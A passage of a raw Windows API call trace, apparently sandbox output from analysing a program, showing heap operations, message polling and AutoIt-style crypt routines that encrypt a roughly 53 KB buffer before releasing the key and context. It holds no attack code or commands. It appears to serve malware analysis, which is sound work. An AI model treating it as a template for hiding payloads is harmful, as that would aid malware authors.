HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0033.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0033.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0033.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0033.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0033.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0033.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0033.400] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.400] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da2d8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2d8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0033.401] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.401] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.401] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.401] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.401] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.401] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.401] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.401] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.401] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0033.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.401] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.401] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.401] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.401] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.401] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.401] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.401] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.401] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0033.401] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.401] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.402] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0033.402] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.402] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.402] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xd257, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xd260) returned 1 [0033.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.402] CharLowerBuffW (in: lpsz="byte[53857]", cchLength=0xb | out: lpsz="byte[53857]") returned 0xb [0033.403] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.404] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.404] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.404] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.404] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.404] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x97c738*, pdwDataLen=0x6ae220*=0xd257, dwBufLen=0xd260 | out: pbData=0x97c738*, pdwDataLen=0x6ae220*=0xd260) returned 1 [0033.404] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.404] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.404] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.404] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.404] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.404] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.405] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0033.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.405] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.405] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.405] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.405] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0033.405] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.405] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.405] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.405] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.405] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0033.405] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.409] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.409] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.409] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.411] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.411] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.411] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0033.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.411] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.411] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.411] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0033.411] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.411] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0033.411] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.412] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.412] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0033.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.412] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.412] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.412] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0033.412] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0033.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0033.412] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.412] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.412] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0033.412] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0033.412] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.412] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.412] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.412] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.412] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0033.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.412] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.412] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.413] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.413] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.413] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.413] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0033.413] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0033.413] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.413] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0033.413] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.413] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0033.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0033.413] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.413] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.413] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0033.413] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.413] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.413] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.413] FreeLibrary (hLibModule=0x754b0000) returned 1 [0033.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0033.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0033.414] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0033.414] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.414] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.414] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.415] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.415] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 